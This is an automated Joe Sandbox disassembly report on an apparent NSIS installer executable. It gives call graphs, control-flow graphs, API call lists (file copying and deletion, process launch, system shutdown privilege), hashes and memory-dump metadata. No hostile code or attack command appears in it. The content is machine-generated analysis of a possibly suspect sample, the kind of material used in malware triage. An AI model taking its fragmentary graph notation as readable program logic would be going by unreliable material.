407254 4967->4969 4970 40725a lstrcpynW 4967->4970 4969->4970 4970->4968 4971 402713 4986 406009 lstrcpynW 4971->4986 4973 40272c 4987 406009 lstrcpynW 4973->4987 4975 402738 4976 40145c 18 API calls 4975->4976 4978 402743 4975->4978 4976->4978 4977 402752 4980 40145c 18 API calls 4977->4980 4982 402761 4977->4982 4978->4977 4979 40145c 18 API calls 4978->4979 4979->4977 4980->4982 4981 40145c 18 API calls 4983 40276b 4981->4983 4982->4981 4984 4062a3 11 API calls 4983->4984 4985 40277f WritePrivateProfileStringW 4984->4985 4986->4973 4987->4975 4988 402797 4989 40145c 18 API calls 4988->4989 4990 4027ae 4989->4990 4991 40145c 18 API calls 4990->4991 4992 4027b7 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027c0 GetPrivateProfileStringW lstrcmpW 4993->4994 4995 402e18 4996 40145c 18 API calls 4995->4996 4997 402e1f FindFirstFileW 4996->4997 4998 402e32 4997->4998 5003 405f51 wsprintfW 4998->5003 5000 402e43 5004 406009 lstrcpynW 5000->5004 5002 402e50 5003->5000 5004->5002 5005 401e9a 5006 40145c 18 API calls 5005->5006 5007 401ea1 5006->5007 5008 401446 18 API calls 5007->5008 5009 401eab wsprintfW 5008->5009 4115 401a1f 4116 40145c 18 API calls 4115->4116 4117 401a26 4116->4117 4118 4062a3 11 API calls 4117->4118 4119 401a49 4118->4119 4120 401a64 4119->4120 4121 401a5c 4119->4121 4169 406009 lstrcpynW 4120->4169 4168 406009 lstrcpynW 4121->4168 4124 401a62 4128 406038 5 API calls 4124->4128 4125 401a6f 4126 406722 3 API calls 4125->4126 4127 401a75 lstrcatW 4126->4127 4127->4124 4130 401a81 4128->4130 4129 4062d5 2 API calls 4129->4130 4130->4129 4131 405e30 2 API calls 4130->4131 4133 401a98 CompareFileTime 4130->4133 4134 401ba9 4130->4134 4138 4062a3 11 API calls 4130->4138 4142 406009 lstrcpynW 4130->4142 4148 406805 18 API calls 4130->4148 4155 405ca0 MessageBoxIndirectW 4130->4155 4159 401b50 4130->4159 4166 401b5d 4130->4166 4167 405e50 GetFileAttributesW CreateFileW 4130->4167 4131->4130 4133->4130 4135 404f72 25 API calls 4134->4135 4137 401bb3 4135->4137 4136 404f72 25 API calls 4139 401b70 4136->4139 4140 40337f 37 API calls 4137->4140 4138->4130 4143 4062a3 11 API calls 4139->4143 4141 401bc6 4140->4141 4144 4062a3 11 API calls 4141->4144 4142->4130 4150 401b8b 4143->4150 4145 401bda 4144->4145 4146 401be9 SetFileTime 4145->4146 4147 401bf8 FindCloseChangeNotification 4145->4147 4146->4147 4149 401c09 4147->4149 4147->4150 4148->4130 4151 401c21 4149->4151 4152 401c0e 4149->4152 4154 406805 18 API calls 4151->4154 4153 406805 18 API calls 4152->4153 4156 401c16 lstrcatW 4153->4156 4157 401c29 4154->4157 4155->4130 4156->4157 4158 4062a3 11 API calls 4157->4158 4160 401c34 4158->4160 4161 401b93 4159->4161 4162 401b53 4159->4162 4163 405ca0 MessageBoxIndirectW 4160->4163 4164 4062a3 11 API calls 4161->4164 4165 4062a3 11 API calls 4162->4165 4163->4150 4164->4150 4165->4166 4166->4136 4167->4130 4168->4124 4169->4125 5010 40209f GetDlgItem GetClientRect 5011 40145c 18 API calls 5010->5011 5012 4020cf LoadImageW SendMessageW 5011->5012 5013 4030e3 5012->5013 5014 4020ed DeleteObject 5012->5014 5014->5013 5015 402b9f 5016 401446 18 API calls 5015->5016 5021 402ba7 5016->5021 5017 402c4a 5018 402bdf ReadFile 5020 402c3d 5018->5020 5018->5021 5019 401446 18 API calls 5019->5020 5020->5017 5020->5019 5027 402d17 ReadFile 5020->5027 5021->5017 5021->5018 5021->5020 5022 402c06 MultiByteToWideChar 5021->5022 5023 402c3f 5021->5023 5025 402c4f 5021->5025 5022->5021 5022->5025 5028 405f51 wsprintfW 5023->5028 5025->5020 5026 402c6b SetFilePointer 5025->5026 5026->5020 5027->5020 5028->5017 5029 402b23 GlobalAlloc 5030 402b39 5029->5030 5031 402b4b 5029->5031 5032 401446 18 API calls 5030->5032 5033 40145c 18 API calls 5031->5033 5034 402b41 5032->5034 5035 402b52 WideCharToMultiByte lstrlenA 5033->5035 5036 402b93 5034->5036 5037 402b84 WriteFile 5034->5037 5035->5034 5037->5036 5038 402384 GlobalFree 5037->5038 5038->5036 5040 4044a5 5041 404512 5040->5041 5042 4044df 5040->5042 5044 40451f GetDlgItem GetAsyncKeyState 5041->5044 5051 4045b1 5041->5051 5108 405c84 GetDlgItemTextW 5042->5108 5047 40453e GetDlgItem 5044->5047 5054 40455c 5044->5054 5045 4044ea 5048 406038 5 API calls 5045->5048 5046 40469d 5106 404833 5046->5106 5110 405c84 GetDlgItemTextW 5046->5110 5049 403d3f 19 API calls 5047->5049 5050 4044f0 5048->5050 5053 404551 ShowWindow 5049->5053 5056 403e74 5 API calls 5050->5056 5051->5046 5057 406805 18 API calls 5051->5057 5051->5106 5053->5054 5059 404579 SetWindowTextW 5054->5059 5064 405d59 4 API calls 5054->5064 5055 403dca 8 API calls 5060 404847 5055->5060 5061 4044f5 GetDlgItem 5056->5061 5062 40462f SHBrowseForFolderW 5057->5062 5058 4046c9 5063 40677e 18 API calls 5058->5063 5065 403d3f 19 API calls 5059->5065 5066 404503 IsDlgButtonChecked 5061->5066 5061->5106 5062->5046 5067 404647 CoTaskMemFree 5062->5067 5068 4046cf 5063->5068 5069 40456f 5064->5069 5070 404597 5065->5070 5066->5041 5071 406722 3 API calls 5067->5071 5111 406009 lstrcpynW 5068->5111 5069->5059 5075 406722 3 API calls 5069->5075 5072 403d3f 19 API calls 5070->5072 5073 404654 5071->5073 5076 4045a2 5072->5076 5077 40468b SetDlgItemTextW 5073->5077 5082 406805 18 API calls 5073->5082 5075->5059 5109 403d98 SendMessageW 5076->5109 5077->5046 5078 4046e6 5080 4062fc 3 API calls 5078->5080 5089 4046ee 5080->5089 5081 4045aa 5085 4062fc 3 API calls 5081->5085 5083 404673 lstrcmpiW 5082->5083 5083->5077 5086 404684 lstrcatW 5083->5086 5084 404730 5112 406009 lstrcpynW 5084->5112 5085->5051 5086->5077 5088 404739 5090 405d59 4 API calls 5088->5090 5089->5084 5094 406751 2 API calls 5089->5094 5095 404785 5089->5095 5091 40473f GetDiskFreeSpaceW 5090->5091 5093 404763 MulDiv 5091->5093 5091->5095 5093->5095 5094->5089 5097 4047e2 5095->5097 5098 4043ad 21 API calls 5095->5098 5096 404805 5113 403d85 EnableWindow 5096->5113 5097->5096 5099 40141d 80 API calls 5097->5099 5100 4047d3 5098->5100 5099->5096 5102 4047e4 SetDlgItemTextW 5100->5102 5103 4047d8 5100->5103 5102->5097 5104 4043ad 21 API calls 5103->5104 5104->5097 5105 404821 5105->5106 5114 403d61 5105->5114 5106->5055 5108->5045 5109->5081 5110->5058 5111->5078 5112->5088 5113->5105 5115 403d74 SendMessageW 5114->5115 5116 403d6f 5114->5116 5115->5106 5116->5115 5117 402da5 5118 4030e3 5117->5118 5119 402dac 5117->5119 5120 401446 18 API calls 5119->5120 5121 402db8 5120->5121 5122 402dbf SetFilePointer 5121->5122 5122->5118 5123 402dcf 5122->5123 5123->5118 5125 405f51 wsprintfW 5123->5125 5125->5118 5126 4030a9 SendMessageW 5127 4030c2 InvalidateRect 5126->5127 5128 4030e3 5126->5128 5127->5128 5129 401cb2 5130 40145c 18 API calls 5129->5130 5131 401c54 5130->5131 5132 4062a3 11 API calls 5131->5132 5135 401c64 5131->5135 5133 401c59 5132->5133 5134 406c9b 81 API calls 5133->5134 5134->5135 4061 4021b5 4062 40145c 18 API calls 4061->4062 4063 4021bb 4062->4063 4064 40145c 18 API calls 4063->4064 4065 4021c4 4064->4065 4066 40145c 18 API calls 4065->4066 4067 4021cd 4066->4067 4068 40145c 18 API calls 4067->4068 4069 4021d6 4068->4069 4070 404f72 25 API calls 4069->4070 4071 4021e2 ShellExecuteW 4070->4071 4072 40221b 4071->4072 4073 40220d 4071->4073 4075 4062a3 11 API calls 4072->4075 4074 4062a3 11 API calls 4073->4074 4074->4072 4076 402230 4075->4076 5143 402238 5144 40145c 18 API calls 5143->5144 5145 40223e 5144->5145 5146 4062a3 11 API calls 5145->5146 5147 40224b 5146->5147 5148 404f72 25 API calls 5147->5148 5149 402255 5148->5149 5150 405c3f 2 API calls 5149->5150 5151 40225b 5150->5151 5152 4062a3 11 API calls 5151->5152 5155 4022ac CloseHandle 5151->5155 5158 40226d 5152->5158 5154 4030e3 5155->5154 5156 402283 WaitForSingleObject 5157 402291 GetExitCodeProcess 5156->5157 5156->5158 5157->5155 5160 4022a3 5157->5160 5158->5155 5158->5156 5159 406332 2 API calls 5158->5159 5159->5156 5162 405f51 wsprintfW 5160->5162 5162->5155 5163 4040b8 5164 4040d3 5163->5164 5172 404201 5163->5172 5168 40410e 5164->5168 5194 403fca WideCharToMultiByte 5164->5194 5165 40426c 5166 404276 GetDlgItem 5165->5166 5167 40433e 5165->5167 5169 404290 5166->5169 5170 4042ff 5166->5170 5173 403dca 8 API calls 5167->5173 5175 403d3f 19 API calls 5168->5175 5169->5170 5178 4042b6 6 API calls 5169->5178 5170->5167 5179 404311 5170->5179 5172->5165 5172->5167 5174 40423b GetDlgItem SendMessageW 5172->5174 5177 404339 5173->5177 5199 403d85 EnableWindow 5174->5199 5176 40414e 5175->5176 5181 403d3f 19 API calls 5176->5181 5178->5170 5182 404327 5179->5182 5183 404317 SendMessageW 5179->5183 5186 40415b CheckDlgButton 5181->5186 5182->5177 5187 40432d SendMessageW 5182->5187 5183->5182 5184 404267 5185 403d61 SendMessageW 5184->5185 5185->5165 5197 403d85 EnableWindow 5186->5197 5187->5177 5189 404179 GetDlgItem 5198 403d98 SendMessageW 5189->5198 5191 40418f SendMessageW 5192 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5191->5192 5193 4041ac GetSysColor 5191->5193 5192->5177 5193->5192 5195 404007 5194->5195 5196 403fe9 GlobalAlloc WideCharToMultiByte 5194->5196 5195->5168 5196->5195 5197->5189 5198->5191 5199->5184 4077 401eb9 4078 401f24 4077->4078 4079 401ec6 4077->4079 4080 401f53 GlobalAlloc 4078->4080 4081 401f28 4078->4081 4082 401ed5 4079->4082 4089 401ef7 4079->4089 4083 406805 18 API calls 4080->4083 4088 4062a3 11 API calls 4081->4088 4093 401f36 4081->4093 4084 4062a3 11 API calls 4082->4084 4087 401f46 4083->4087 4085 401ee2 4084->4085 4090 402708 4085->4090 4095 406805 18 API calls 4085->4095 4087->4090 4091 402387 GlobalFree 4087->4091 4088->4093 4099 406009 lstrcpynW 4089->4099 4091->4090 4101 406009 lstrcpynW 4093->4101 4094 401f06 4100 406009 lstrcpynW 4094->4100 4095->4085 4097 401f15 4102 406009 lstrcpynW 4097->4102 4099->4094 4100->4097 4101->4087 4102->4090 5200 4074bb 5202 407344 5200->5202 5201 407c6d 5202->5201 5203 4073c2 GlobalFree 5202->5203 5204 4073cb GlobalAlloc 5202->5204 5205 407443 GlobalAlloc 5202->5205 5206 40743a GlobalFree 5202->5206 5203->5204 5204->5201 5204->5202 5205->5201 5205->5202 5206->5205

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 146 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 153 403923-403937 call 405d06 CharNextW 146->153 154 40391b-40391e 146->154 157 4039ca-4039d0 153->157 154->153 158 4039d6 157->158 159 40393c-403942 157->159 160 4039f5-403a0d GetTempPathW call 4037cc 158->160 161 403944-40394a 159->161 162 40394c-403950 159->162 169 403a33-403a4d DeleteFileW call 403587 160->169 170 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 160->170 161->161 161->162 164 403952-403957 162->164 165 403958-40395c 162->165 164->165 167 4039b8-4039c5 call 405d06 165->167 168 40395e-403965 165->168 167->157 183 4039c7 167->183 172 403967-40396e 168->172 173 40397a-40398c call 403800 168->173 186 403acc-403adb call 403859 OleUninitialize 169->186 187 403a4f-403a55 169->187 170->169 170->186 174 403970-403973 172->174 175 403975 172->175 184 4039a1-4039b6 call 403800 173->184 185 40398e-403995 173->185 174->173 174->175 175->173 183->157 184->167 202 4039d8-4039f0 call 407d6e call 406009 184->202 189 403997-40399a 185->189 190 40399c 185->190 200 403ae1-403af1 call 405ca0 ExitProcess 186->200 201 403bce-403bd4 186->201 192 403ab5-403abc call 40592c 187->192 193 403a57-403a60 call 405d06 187->193 189->184 189->190 190->184 199 403ac1-403ac7 call 4060e7 192->199 203 403a79-403a7b 193->203 199->186 206 403c51-403c59 201->206 207 403bd6-403bf3 call 4062fc * 3 201->207 202->160 211 403a62-403a74 call 403800 203->211 212 403a7d-403a87 203->212 213 403c5b 206->213 214 403c5f 206->214 238 403bf5-403bf7 207->238 239 403c3d-403c48 ExitWindowsEx 207->239 211->212 225 403a76 211->225 219 403af7-403b11 lstrcatW lstrcmpiW 212->219 220 403a89-403a99 call 40677e 212->220 213->214 219->186 224 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 219->224 220->186 231 403a9b-403ab1 call 406009 * 2 220->231 228 403b36-403b56 call 406009 * 2 224->228 229 403b2b-403b31 call 406009 224->229 225->203 245 403b5b-403b77 call 406805 DeleteFileW 228->245 229->228 231->192 238->239 243 403bf9-403bfb 238->243 239->206 242 403c4a-403c4c call 40141d 239->242 242->206 243->239 247 403bfd-403c0f GetCurrentProcess 243->247 253 403bb8-403bc0 245->253 254 403b79-403b89 CopyFileW 245->254 247->239 252 403c11-403c33 247->252 252->239 253->245 255 403bc2-403bc9 call 406c68 253->255 254->253 256 403b8b-403bab call 406c68 call 406805 call 405c3f 254->256 255->186 256->253 266 403bad-403bb4 CloseHandle 256->266 266->253
                                        APIs
                                        • #17.COMCTL32 ref: 004038A2
                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                        • OleInitialize.OLE32(00000000), ref: 004038B4
                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                        • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                        • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                        • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                        • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                        • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                        • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                        • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                        • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                        • OleUninitialize.OLE32(?), ref: 00403AD1
                                        • ExitProcess.KERNEL32 ref: 00403AF1
                                        • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                        • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                        • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                        • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                        • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                        • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                        • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                        • API String ID: 2435955865-239407132
                                        • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                        • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                        • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                        • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 625 4074bb-4074c0 626 4074c2-4074ef 625->626 627 40752f-407547 625->627 629 4074f1-4074f4 626->629 630 4074f6-4074fa 626->630 628 407aeb-407aff 627->628 634 407b01-407b17 628->634 635 407b19-407b2c 628->635 631 407506-407509 629->631 632 407502 630->632 633 4074fc-407500 630->633 636 407527-40752a 631->636 637 40750b-407514 631->637 632->631 633->631 638 407b33-407b3a 634->638 635->638 641 4076f6-407713 636->641 642 407516 637->642 643 407519-407525 637->643 639 407b61-407c68 638->639 640 407b3c-407b40 638->640 656 407350 639->656 657 407cec 639->657 645 407b46-407b5e 640->645 646 407ccd-407cd4 640->646 648 407715-407729 641->648 649 40772b-40773e 641->649 642->643 644 407589-4075b6 643->644 652 4075d2-4075ec 644->652 653 4075b8-4075d0 644->653 645->639 650 407cdd-407cea 646->650 654 407741-40774b 648->654 649->654 655 407cef-407cf6 650->655 658 4075f0-4075fa 652->658 653->658 659 40774d 654->659 660 4076ee-4076f4 654->660 661 407357-40735b 656->661 662 40749b-4074b6 656->662 663 40746d-407471 656->663 664 4073ff-407403 656->664 657->655 667 407600 658->667 668 407571-407577 658->668 669 407845-4078a1 659->669 670 4076c9-4076cd 659->670 660->641 666 407692-40769c 660->666 661->650 671 407361-40736e 661->671 662->628 676 407c76-407c7d 663->676 677 407477-40748b 663->677 682 407409-407420 664->682 683 407c6d-407c74 664->683 672 4076a2-4076c4 666->672 673 407c9a-407ca1 666->673 685 407556-40756e 667->685 686 407c7f-407c86 667->686 674 40762a-407630 668->674 675 40757d-407583 668->675 669->628 678 407c91-407c98 670->678 679 4076d3-4076eb 670->679 671->657 687 407374-4073ba 671->687 672->669 673->650 688 40768e 674->688 689 407632-40764f 674->689 675->644 675->688 676->650 684 40748e-407496 677->684 678->650 679->660 690 407423-407427 682->690 683->650 684->663 694 407498 684->694 685->668 686->650 692 4073e2-4073e4 687->692 693 4073bc-4073c0 687->693 688->666 695 407651-407665 689->695 696 407667-40767a 689->696 690->664 691 407429-40742f 690->691 698 407431-407438 691->698 699 407459-40746b 691->699 702 4073f5-4073fd 692->702 703 4073e6-4073f3 692->703 700 4073c2-4073c5 GlobalFree 693->700 701 4073cb-4073d9 GlobalAlloc 693->701 694->662 697 40767d-407687 695->697 696->697 697->674 704 407689 697->704 705 407443-407453 GlobalAlloc 698->705 706 40743a-40743d GlobalFree 698->706 699->684 700->701 701->657 707 4073df 701->707 702->690 703->702 703->703 709 407c88-407c8f 704->709 710 40760f-407627 704->710 705->657 705->699 706->705 707->692 709->650 710->674
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                        • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                        • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                        • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                        • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: AddressHandleLibraryLoadModuleProc
                                        • String ID:
                                        • API String ID: 310444273-0
                                        • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                        • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                        • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                        • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                        APIs
                                        • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                        • FindClose.KERNEL32(00000000), ref: 004062EC
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_9CFE.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID:
                                        • API String ID: 2295610775-0
                                        • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                        • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                        • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                        • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 4015a0-4015f4 1 4030e3-4030ec 0->1 2 4015fa 0->2 26 4030ee-4030f2 1->26 4 401601-401611 call 4062a3 2->4 5 401742-40174f 2->5 6 401962-40197d call 40145c GetFullPathNameW 2->6 7 4019ca-4019e6 call 40145c SearchPathW 2->7 8 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 2->8 9 401650-401668 call 40137e call 4062a3 call 40139d 2->9 10 4017b1-4017d8 call 40145c call 4062a3 call 405d59 2->10 11 401672-401686 call 40145c call 4062a3 2->11 12 401693-4016ac call 401446 call 4062a3 2->12 13 401715-401731 2->13 14 401616-40162d call 40145c call 4062a3 call 404f72 2->14 15 4016d6-4016db 2->15 16 401736-4030de 2->16 17 401897-4018a7 call 40145c call 4062d5 2->17 18 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 2->18 19 40163c-401645 2->19 20 4016bd-4016d1 call 4062a3 SetForegroundWindow 2->20 4->26 30 401751-401755 ShowWindow 5->30 31 401758-40175f 5->31 65 4019a3-4019a8 6->65 66 40197f-401984 6->66 7->1 58 4019ec-4019f8 7->58 8->1 83 40179a-4017a6 call 4062a3 8->83 92 40166d 9->92 105 401864-40186c 10->105 106 4017de-4017fc call 405d06 CreateDirectoryW 10->106 84 401689-40168e call 404f72 11->84 89 4016b1-4016b8 Sleep 12->89 90 4016ae-4016b0 12->90 13->26 27 401632-401637 14->27 24 401702-401710 15->24 25 4016dd-4016fd call 401446 15->25 16->1 60 4030de call 405f51 16->60 85 4018c2-4018d6 call 4062a3 17->85 86 4018a9-4018bd call 4062a3 17->86 113 401912-401919 18->113 114 40191e-401921 18->114 19->27 28 401647-40164e PostQuitMessage 19->28 20->1 24->1 25->1 27->26 28->27 30->31 31->1 49 401765-401769 ShowWindow 31->49 49->1 58->1 60->1 69 4019af-4019b2 65->69 66->69 76 401986-401989 66->76 69->1 79 4019b8-4019c5 GetShortPathNameW 69->79 76->69 87 40198b-401993 call 4062d5 76->87 79->1 100 4017ab-4017ac 83->100 84->1 85->26 86->26 87->65 110 401995-4019a1 call 406009 87->110 89->1 90->89 92->26 100->1 108 401890-401892 105->108 109 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 105->109 118 401846-40184e call 4062a3 106->118 119 4017fe-401809 GetLastError 106->119 108->84 109->1 110->69 113->84 120 401923-40192b call 4062d5 114->120 121 40194a-401950 114->121 133 401853-401854 118->133 124 401827-401832 GetFileAttributesW 119->124 125 40180b-401825 GetLastError call 4062a3 119->125 120->121 139 40192d-401948 call 406c68 call 404f72 120->139 129 401957-40195d call 4062a3 121->129 131 401834-401844 call 4062a3 124->131 132 401855-40185e 124->132 125->132 129->100 131->133 132->105 132->106 133->132 139->129
                                        APIs
                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                        • ShowWindow.USER32(?), ref: 00401753
                                        • ShowWindow.USER32(?), ref: 00401767
                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                        • SetCurrentDirectoryW.KERNEL32(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                        • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                        Strings
                                        • detailprint: %s, xrefs: 00401679
                                        • Rename failed: %s, xrefs: 0040194B
                                        • Rename: %s, xrefs: 004018F8
                                        • SetFileAttributes failed., xrefs: 004017A1
